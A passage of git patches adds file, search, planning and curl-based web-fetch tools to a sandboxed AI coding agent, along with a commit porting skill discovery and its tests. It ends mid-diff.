+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+interface GrepMatch {
+  file: string;
+  line: number;
+  content: string;
+}
+
+const grepInputSchema = z.object({
+  pattern: z.string().describe("Regex pattern to search for"),
+  path: z.string().describe("Workspace-relative file or directory to search in (e.g., src)"),
+  glob: z.string().optional().describe("Glob pattern to filter files (e.g., '*.ts')"),
+  caseSensitive: z.boolean().optional().describe("Case-sensitive search. Default: true"),
+});
+
+const GREP_TIMEOUT_MS = 30_000;
+const MAX_TOTAL_MATCHES = 100;
+const MAX_PER_FILE_MATCHES = 10;
+const MAX_LINE_LENGTH = 200;
+
+/**
+ * `grep` — search for POSIX-ERE patterns across files in the sandbox via
+ * `grep -rn`. Caps results to 100 total / 10 per file / 200 chars per
+ * match line so long stdouts don't blow the model context.
+ */
+export const grepTool = tool({
+  description: `Search for patterns in files using POSIX Extended Regular Expressions (ERE).
+
+WHEN TO USE:
+- Finding where a function, variable, or string literal is used
+- Locating configuration keys, routes, or error messages across files
+- Narrowing down which files to read or edit
+
+WHEN NOT TO USE:
+- Simple filename-only searches (use globTool instead)
+- Directory listings, builds, or other shell tasks (use bashTool instead)
+
+USAGE:
+- Uses POSIX ERE syntax (e.g., "log.*Error", "function[[:space:]]+[a-zA-Z_]+")
+- Perl-style shorthands like \\s, \\w, \\d are NOT supported; use POSIX classes instead: [[:space:]], [[:alnum:]_], [[:digit:]]
+- Search a specific file OR an entire directory via the path parameter
+- Use workspace-relative paths for path (e.g., "src")
+- Optionally filter files with glob (e.g., "*.ts", "*.test.js")
+- Matches are SINGLE-LINE: patterns do not span across newline characters
+- Results are limited to 100 matches total, with up to 10 matches per file; each match line is truncated to 200 characters
+
+IMPORTANT:
+- ALWAYS use this tool for code/content searches instead of running grep/rg via bashTool
+- Use caseSensitive: false for case-insensitive searches
+- Hidden files and node_modules are skipped when searching directories`,
+  inputSchema: grepInputSchema,
+  execute: async (
+    { pattern, path: searchPath, glob, caseSensitive = true },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "grep");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(searchPath)
+        ? searchPath
+        : path.resolve(workingDirectory, searchPath);
+
+      const args: string[] = ["grep", "-rn"];
+      if (!caseSensitive) args.push("-i");
+      args.push(
+        `--exclude-dir=${shellEscape(".*")}`,
+        `--exclude-dir=${shellEscape("node_modules")}`,
+      );
+      if (glob) args.push(`--include=${shellEscape(glob)}`);
+      args.push(
+        "-m",
+        String(MAX_PER_FILE_MATCHES),
+        "-E",
+        shellEscape(pattern),
+        shellEscape(absolutePath),
+      );
+      const command = args.join(" ");
+
+      const result = await sandbox.exec(command, workingDirectory, GREP_TIMEOUT_MS, {
+        signal: abortSignal,
+      });
+
+      // grep exits with 1 when no matches found — that's not an error.
+      if (!result.success && result.exitCode !== 1) {
+        const errorOutput = (result.stderr || result.stdout).slice(0, 500);
+        return {
+          success: false,
+          error: `Grep failed (exit ${result.exitCode}): ${errorOutput}`,
+        };
+      }
+
+      const matches: GrepMatch[] = [];
+      const filesSet = new Set<string>();
+      const fileMatchCounts = new Map<string, number>();
+
+      const lines = result.stdout.split("\n").filter(Boolean);
+      for (const line of lines) {
+        if (matches.length >= MAX_TOTAL_MATCHES) break;
+
+        // grep -rn output: file:line:content. Find the `:digits:` separator.
+        const match = line.match(/:(\d+):/);
+        if (!match || match.index === undefined) continue;
+        const file = line.slice(0, match.index);
+        const rest = line.slice(match.index + 1);
+        const colonIndex = rest.indexOf(":");
+        if (colonIndex === -1) continue;
+
+        const lineNum = parseInt(rest.slice(0, colonIndex), 10);
+        const content = rest.slice(colonIndex + 1);
+        if (isNaN(lineNum)) continue;
+
+        const displayFile = toDisplayPath(file, workingDirectory);
+        filesSet.add(displayFile);
+        const currentFileCount = fileMatchCounts.get(displayFile) ?? 0;
+        if (currentFileCount >= MAX_PER_FILE_MATCHES) continue;
+
+        fileMatchCounts.set(displayFile, currentFileCount + 1);
+        matches.push({
+          file: displayFile,
+          line: lineNum,
+          content: content.slice(0, MAX_LINE_LENGTH),
+        });
+      }
+
+      return {
+        success: true,
+        pattern,
+        matchCount: matches.length,
+        filesWithMatches: filesSet.size,
+        matches,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Grep failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/readFileTool.ts b/lib/agent/tools/readFileTool.ts
new file mode 100644
index 000000000..f5a486a64
--- /dev/null
+++ b/lib/agent/tools/readFileTool.ts
@@ -0,0 +1,70 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const readInputSchema = z.object({
+  filePath: z.string().describe("Workspace-relative path to the file to read (e.g., src/index.ts)"),
+  offset: z.number().optional().describe("Line number to start reading from (1-indexed)"),
+  limit: z.number().optional().describe("Maximum number of lines to read. Default: 2000"),
+});
+
+/**
+ * `read` — read a file from the sandbox. Returns numbered lines in the
+ * format `N: <content>` so the model can refer to specific lines when
+ * later editing.
+ */
+export const readFileTool = tool({
+  description: `Read a file from the filesystem.
+
+USAGE:
+- Use workspace-relative paths (e.g., "src/index.ts")
+- Paths are resolved from the workspace root
+- By default reads up to 2000 lines starting from line 1
+- Use offset and limit for long files (both are line-based, 1-indexed)
+- Results include line numbers starting at 1 in "N: content" format
+
+IMPORTANT:
+- Always read a file at least once before editing it with the edit/write tools
+- This tool can only read files, not directories — attempting to read a directory returns an error
+- You can call multiple reads in parallel to speculatively load several files`,
+  inputSchema: readInputSchema,
+  execute: async ({ filePath, offset = 1, limit = 2000 }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "read");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+
+      const stats = await sandbox.stat(absolutePath);
+      if (stats.isDirectory()) {
+        return {
+          success: false,
+          error: "Cannot read a directory. Use glob or ls command instead.",
+        };
+      }
+
+      const content = await sandbox.readFile(absolutePath, "utf-8");
+      const lines = content.split("\n");
+      const startLine = Math.max(1, offset) - 1;
+      const endLine = Math.min(lines.length, startLine + limit);
+      const selectedLines = lines.slice(startLine, endLine);
+      const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`);
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        totalLines: lines.length,
+        startLine: startLine + 1,
+        endLine,
+        content: numberedLines.join("\n"),
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to read file: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/shellEscape.ts b/lib/agent/tools/shellEscape.ts
new file mode 100644
index 000000000..8ba4a71a3
--- /dev/null
+++ b/lib/agent/tools/shellEscape.ts
@@ -0,0 +1,14 @@
+/**
+ * Escape a string for safe use as a single-quoted shell argument.
+ *
+ * Wraps the string in single quotes and escapes any embedded single
+ * quotes via the standard `' → '\''` dance (close quote, escape literal
+ * quote, reopen quote). Everything else stays verbatim inside single
+ * quotes — shell metacharacters like `$`, `` ` ``, `&`, `*` are NOT
+ * expanded so the result is safe to pass to `bash -c` or `sh -c`.
+ *
+ * @param s - The string to escape.
+ */
+export function shellEscape(s: string): string {
+  return "'" + s.replace(/'/g, "'\\''") + "'";
+}
diff --git a/lib/agent/tools/toDisplayPath.ts b/lib/agent/tools/toDisplayPath.ts
new file mode 100644
index 000000000..827c391af
--- /dev/null
+++ b/lib/agent/tools/toDisplayPath.ts
@@ -0,0 +1,34 @@
+import * as path from "path";
+
+function isPathWithinDirectory(filePath: string, directory: string): boolean {
+  const resolvedPath = path.resolve(filePath);
+  const resolvedDir = path.resolve(directory);
+  return resolvedPath.startsWith(resolvedDir + path.sep) || resolvedPath === resolvedDir;
+}
+
+/**
+ * Convert an absolute (or relative-to-workingDirectory) path into a compact
+ * model-friendly display path.
+ *
+ * Paths inside the working directory are returned relative (e.g.
+ * `src/index.ts`) to avoid repeating long absolute prefixes in tool output.
+ * Paths outside the working directory remain absolute for clarity and safety
+ * (e.g. `/etc/hosts`). All separators are normalized to `/`.
+ *
+ * @param filePath - Absolute or workspace-relative file path.
+ * @param workingDirectory - The sandbox's working directory (always absolute).
+ */
+export function toDisplayPath(filePath: string, workingDirectory: string): string {
+  const absolutePath = path.isAbsolute(filePath)
+    ? path.resolve(filePath)
+    : path.resolve(workingDirectory, filePath);
+
+  if (!isPathWithinDirectory(absolutePath, workingDirectory)) {
+    return absolutePath.replace(/\\/g, "/");
+  }
+
+  const relativePath = path.relative(workingDirectory, absolutePath);
+  if (relativePath === "") return ".";
+
+  return relativePath.replace(/\\/g, "/");
+}
diff --git a/lib/agent/tools/todoWriteTool.ts b/lib/agent/tools/todoWriteTool.ts
new file mode 100644
index 000000000..d91e9147a
--- /dev/null
+++ b/lib/agent/tools/todoWriteTool.ts
@@ -0,0 +1,65 @@
+import { tool } from "ai";
+import { z } from "zod";
+
+export const todoStatusSchema = z.enum(["pending", "in_progress", "completed"]);
+export type TodoStatus = z.infer<typeof todoStatusSchema>;
+
+export const todoItemSchema = z.object({
+  id: z.string().describe("Unique identifier for the todo item"),
+  content: z.string().describe("The task description"),
+  status: todoStatusSchema.describe(
+    "Current status. Only ONE task should be in_progress at a time.",
+  ),
+});
+export type TodoItem = z.infer<typeof todoItemSchema>;
+
+/**
+ * `todo_write` — the agent's planning surface. Stateless on the server side
+ * (the tool simply echoes the list back to the chat UI so the user sees the
+ * current plan). The agent uses this to track multi-step work and signal
+ * intent between turns.
+ *
+ * Slot into `buildAgentTools` as `todo_write: todoWriteTool`.
+ */
+export const todoWriteTool = tool({
+  description: `Create and manage a structured task list for the current session.
+
+WHEN TO USE:
+- Complex multi-step tasks requiring 3 or more distinct steps
+- When the user provides multiple requirements or a checklist
+- After receiving new instructions - immediately capture them as todos
+- When starting work on a task - mark that todo as in_progress BEFORE beginning
+- After completing a task - mark it as completed immediately
+
+WHEN NOT TO USE:
+- A single, straightforward task that can be done in one step
+- Trivial tasks requiring fewer than 3 minor steps
+- Purely conversational or informational queries
+
+TASK STATES:
+- "pending": Task not yet started
+- "in_progress": Currently being worked on (ONLY ONE todo should be in this state at a time)
+- "completed": Task finished successfully
+
+USAGE:
+- This tool REPLACES the entire todo list - always send the full, updated list of todos
+- Use it frequently to keep the task list in sync with your actual progress
+- Update statuses as you start and finish work, rather than batching updates later
+
+IMPORTANT:
+- Only one todo should be in_progress at a time; avoid parallel in_progress tasks
+- Mark todos as completed as soon as they are done - do not wait to batch completions
+- Use clear, concise todo content so the list remains readable to the user`,
+  inputSchema: z.object({
+    todos: z
+      .array(todoItemSchema)
+      .describe("The complete list of todo items. This replaces existing todos."),
+  }),
+  execute: async ({ todos }) => {
+    return {
+      success: true,
+      message: `Updated task list with ${todos.length} items`,
+      todos,
+    };
+  },
+});
diff --git a/lib/agent/tools/webFetchTool.ts b/lib/agent/tools/webFetchTool.ts
new file mode 100644
index 000000000..b395457f9
--- /dev/null
+++ b/lib/agent/tools/webFetchTool.ts
@@ -0,0 +1,124 @@
+import { tool } from "ai";
+import { z } from "zod";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+
+const FETCH_TIMEOUT_MS = 30_000;
+export const MAX_BODY_LENGTH = 10_000;
+
+const fetchInputSchema = z.object({
+  url: z.string().url().describe("The URL to fetch"),
+  method: z
+    .enum(["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD"])
+    .optional()
+    .describe("HTTP method. Default: GET"),
+  headers: z
+    .record(z.string(), z.string())
+    .optional()
+    .describe("Optional HTTP headers as key-value pairs"),
+  body: z.string().optional().describe("Optional request body (for POST/PUT/PATCH)"),
+});
+
+const fetchOutputSchema = z.union([
+  z.object({
+    success: z.literal(true),
+    status: z.number().int().nullable(),
+    body: z.string(),
+    truncated: z.boolean(),
+  }),
+  z.object({ success: z.literal(false), error: z.string() }),
+]);
+
+/**
+ * `web_fetch` — make an HTTP request from inside the sandbox via curl.
+ * Lives in the sandbox (not on the worker) so requests come from the
+ * sandbox's network egress, can reuse its env, and don't bypass any
+ * sandbox-level policies. Truncates response bodies to 10KB to protect
+ * model context.
+ */
+export const webFetchTool = tool({
+  description: `Fetch a URL from the web.
+
+USAGE:
+- Make HTTP requests to external URLs
+- Supports GET, POST, PUT, PATCH, DELETE, and HEAD methods
+- Returns the response status and body text
+- Body is truncated to ${MAX_BODY_LENGTH} characters to avoid overwhelming context`,
+  inputSchema: fetchInputSchema,
+  outputSchema: fetchOutputSchema,
+  execute: async (
+    { url, method = "GET", headers, body },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "web_fetch");
+    const workingDirectory = sandbox.workingDirectory;
+    const recoupEnv = buildRecoupExecEnv(experimental_context);
+
+    const args: string[] = [
+      "curl",
+      "-sS",
+      "-X",
+      method,
+      "--max-time",
+      String(Math.ceil(FETCH_TIMEOUT_MS / 1000)),
+      "-o",
+      `>(head -c ${MAX_BODY_LENGTH} >&3)`,
+      "-w",
+      shellEscape("%{http_code}"),
+    ];
+
+    if (headers) {
+      for (const [key, value] of Object.entries(headers)) {
+        args.push("-H", shellEscape(`${key}: ${value}`));
+      }
+    }
+    if (method !== "GET" && method !== "HEAD" && body) {
+      args.push("-d", shellEscape(body));
+    }
+    args.push(shellEscape(url));
+
+    // Use fd 3 to split curl's response body (truncated by `head -c`) from
+    // the status code written via `-w`. The body goes to stdout via fd 3
+    // → fd 1, then we append the status code on its own newline.
+    const command = [
+      "exec 3>&1",
+      `status=$(${args.join(" ")})`,
+      "curlExit=$?",
+      "exec 3>&-",
+      "printf '\\n%s' \"$status\"",
+      "exit $curlExit",
+    ].join("\n");
+
+    try {
+      const result = await sandbox.exec(command, workingDirectory, FETCH_TIMEOUT_MS, {
+        signal: abortSignal,
+        ...(recoupEnv ? { env: recoupEnv } : {}),
+      });
+
+      // exit 23 = curl wrote partial output (`head -c` cut it off — expected for large responses).
+      if (result.exitCode !== 0 && result.exitCode !== 23) {
+        return {
+          success: false,
+          error: `Fetch failed: ${result.stderr || result.stdout || "Unknown error"}`,
+        };
+      }
+
+      const output = result.stdout ?? "";
+      const lastNewline = output.lastIndexOf("\n");
+      const statusText = lastNewline !== -1 ? output.slice(lastNewline + 1).trim() : "";
+      const responseBody = lastNewline !== -1 ? output.slice(0, lastNewline) : output;
+      const status = /^\d+$/.test(statusText) ? parseInt(statusText, 10) : null;
+
+      return {
+        success: true,
+        status,
+        body: responseBody,
+        truncated: result.exitCode === 23,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Fetch failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/writeFileTool.ts b/lib/agent/tools/writeFileTool.ts
new file mode 100644
index 000000000..c8e59e3c3
--- /dev/null
+++ b/lib/agent/tools/writeFileTool.ts
@@ -0,0 +1,65 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const writeInputSchema = z.object({
+  filePath: z
+    .string()
+    .describe("Workspace-relative path to the file to write (e.g., src/user.test.ts)"),
+  content: z.string().describe("Content to write to the file"),
+});
+
+/**
+ * `write` — create or completely overwrite a file in the sandbox. Parent
+ * directories are created as needed. For small targeted edits prefer
+ * `editFileTool`.
+ */
+export const writeFileTool = tool({
+  description: `Write content to a file on the filesystem.
+
+WHEN TO USE:
+- Creating a new file that does not yet exist
+- Completely replacing the contents of an existing file after you've read it
+
+WHEN NOT TO USE:
+- Small or localized changes to an existing file (prefer editFileTool)
+- Reading files (use readFileTool instead)
+- Searching (use grepTool or globTool instead)
+
+USAGE:
+- Use workspace-relative paths (e.g., "src/user.test.ts")
+- This will OVERWRITE existing files entirely
+- Parent directories are created automatically if they do not exist
+
+IMPORTANT:
+- ALWAYS read an existing file with readFileTool before overwriting it
+- Prefer editing existing files over creating new ones unless a new file is explicitly needed
+- NEVER proactively create documentation files (e.g., *.md) unless the user explicitly requests them
+- Do not write files that contain secrets or credentials (API keys, passwords, .env, etc.)`,
+  inputSchema: writeInputSchema,
+  execute: async ({ filePath, content }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "write");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+      const dir = path.dirname(absolutePath);
+      await sandbox.mkdir(dir, { recursive: true });
+      await sandbox.writeFile(absolutePath, content, "utf-8");
+      const stats = await sandbox.stat(absolutePath);
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        bytesWritten: stats.size,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to write file: ${message}` };
+    }
+  },
+});

From 5e1a386463c7f25fd733d1711c2a28a0afc1b8a1 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 14:47:56 -0500
Subject: [PATCH 05/10] feat(chat-workflow): port skill discovery + skillTool
 (PR 6, slim) (#587)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |   2 +-
 lib/agent/__tests__/buildAgentTools.test.ts   |  47 ++++-
 lib/agent/buildAgentTools.ts                  |  24 +--
 lib/agent/tools/AgentContext.ts               |  11 ++
 lib/agent/tools/__tests__/skillTool.test.ts   | 169 ++++++++++++++++++
 lib/agent/tools/skillTool.ts                  |  87 +++++++++
 .../handleChatWorkflowStream.test.ts          |  13 ++
 lib/chat/handleChatWorkflowStream.ts          |  21 +++
 lib/skills/__tests__/discoverSkills.test.ts   | 158 ++++++++++++++++
 lib/skills/__tests__/extractSkillBody.test.ts |  22 +++
 lib/skills/__tests__/findSkillFile.test.ts    |  34 ++++
 .../getGlobalSkillsDirectory.test.ts          |  15 ++
 .../getSandboxSkillDirectories.test.ts        |  23 +++
 lib/skills/__tests__/getSkills.test.ts        |  31 ++++
 .../__tests__/injectSkillDirectory.test.ts    |  14 ++
 .../__tests__/parseSkillFrontmatter.test.ts   |  56 ++++++
 .../__tests__/substituteArguments.test.ts     |  22 +++
 lib/skills/discoverSkills.ts                  |  89 +++++++++
 lib/skills/extractSkillBody.ts                |  14 ++
 lib/skills/findSkillFile.ts                   |  33 ++++
 lib/skills/getGlobalSkillsDirectory.ts        |  14 ++
 lib/skills/getSandboxSkillDirectories.ts      |  16 ++
 lib/skills/getSkills.ts                       |  22 +++
 lib/skills/injectSkillDirectory.ts            |  11 ++
 lib/skills/parseSkillFrontmatter.ts           |  52 ++++++
 lib/skills/skillTypes.ts                      |  76 ++++++++
 lib/skills/substituteArguments.ts             |  14 ++
 27 files changed, 1071 insertions(+), 19 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/skillTool.test.ts
 create mode 100644 lib/agent/tools/skillTool.ts
 create mode 100644 lib/skills/__tests__/discoverSkills.test.ts
 create mode 100644 lib/skills/__tests__/extractSkillBody.test.ts
 create mode 100644 lib/skills/__tests__/findSkillFile.test.ts
 create mode 100644 lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
 create mode 100644 lib/skills/__tests__/getSandboxSkillDirectories.test.ts
 create mode 100644 lib/skills/__tests__/getSkills.test.ts
 create mode 100644 lib/skills/__tests__/injectSkillDirectory.test.ts
 create mode 100644 lib/skills/__tests__/parseSkillFrontmatter.test.ts
 create mode 100644 lib/skills/__tests__/substituteArguments.test.ts
 create mode 100644 lib/skills/discoverSkills.ts
 create mode 100644 lib/skills/extractSkillBody.ts
 create mode 100644 lib/skills/findSkillFile.ts
 create mode 100644 lib/skills/getGlobalSkillsDirectory.ts
 create mode 100644 lib/skills/getSandboxSkillDirectories.ts
 create mode 100644 lib/skills/getSkills.ts
 create mode 100644 lib/skills/injectSkillDirectory.ts
 create mode 100644 lib/skills/parseSkillFrontmatter.ts
 create mode 100644 lib/skills/skillTypes.ts
 create mode 100644 lib/skills/substituteArguments.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index f9a894195..704035c64 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -42,7 +42,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   });
 
   const modelMessages = convertToModelMessages(input.messages);
-  const tools = buildAgentTools();
+  const tools = buildAgentTools({ skills: input.agentContext.skills });
   const result = streamText({
     model: gateway(input.modelId),
     system: agentCustomInstructions,
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index 5478c59ca..fb5d99a5a 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
-const EXPECTED_TOOL_NAMES = [
+const BASE_TOOLS = [
   "bash",
   "read",
   "write",
@@ -13,19 +13,50 @@ const EXPECTED_TOOL_NAMES = [
 ] as const;
 
 describe("buildAgentTools", () => {
-  it("returns a tools record with all 8 leaf tools registered", () => {
+  it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => {
     const tools = buildAgentTools();
-    for (const name of EXPECTED_TOOL_NAMES) {
+    for (const name of BASE_TOOLS) {
       expect(tools).toHaveProperty(name);
     }
+    expect(tools).not.toHaveProperty("skill");
+  });
+
+  it("registers the skill tool when a non-empty skill catalog is provided", () => {
+    const tools = buildAgentTools({
+      skills: [
+        {
+          name: "commit",
+          description: "Make a commit",
+          path: "/sandbox/mono/skills/commit",
+          filename: "SKILL.md",
+          options: {},
+        },
+      ],
+    });
+    expect(tools).toHaveProperty("skill");
+    for (const name of BASE_TOOLS) {
+      expect(tools).toHaveProperty(name);
+    }
+  });
+
+  it("omits the skill tool when an empty array is passed", () => {
+    const tools = buildAgentTools({ skills: [] });
+    expect(tools).not.toHaveProperty("skill");
   });
 
   it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
-    const tools = buildAgentTools() as Record<
-      string,
-      { description?: unknown; inputSchema?: unknown; execute?: unknown }
-    >;
-    for (const name of EXPECTED_TOOL_NAMES) {
+    const tools = buildAgentTools({
+      skills: [
+        {
+          name: "foo",
+          description: "x",
+          path: "/p",
+          filename: "SKILL.md",
+          options: {},
+        },
+      ],
+    }) as Record<string, { description?: unknown; inputSchema?: unknown; execute?: unknown }>;
+    for (const name of [...BASE_TOOLS, "skill"]) {
       const t = tools[name]!;
       expect(typeof t.description).toBe("string");
       expect(t.inputSchema).toBeDefined();
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index f9cbc2b39..393b32889 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -6,24 +6,27 @@ import { grepTool } from "@/lib/agent/tools/grepTool";
 import { globTool } from "@/lib/agent/tools/globTool";
 import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
 import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
+import { skillTool } from "@/lib/agent/tools/skillTool";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Factory for the full agent tool set passed into `streamText({ tools })`.
- * Each tool reads its sandbox handle + recoup creds from `experimental_context`
- * at execute time — the factory takes no arguments because the tools are
- * stateless modulo that context.
+ * Each tool reads its sandbox handle + per-prompt context from
+ * `experimental_context` at execute time — the factory is otherwise stateless.
  *
- * Currently ships 8 leaf tools:
- *   - bash, read, write, edit, grep, glob (sandbox / file ops)
+ * Currently ships 9 tools:
+ *   - 6 file/shell: bash, read, write, edit, grep, glob
  *   - todo_write (planning surface; stateless, echoes the list back)
  *   - web_fetch (HTTP via curl inside the sandbox)
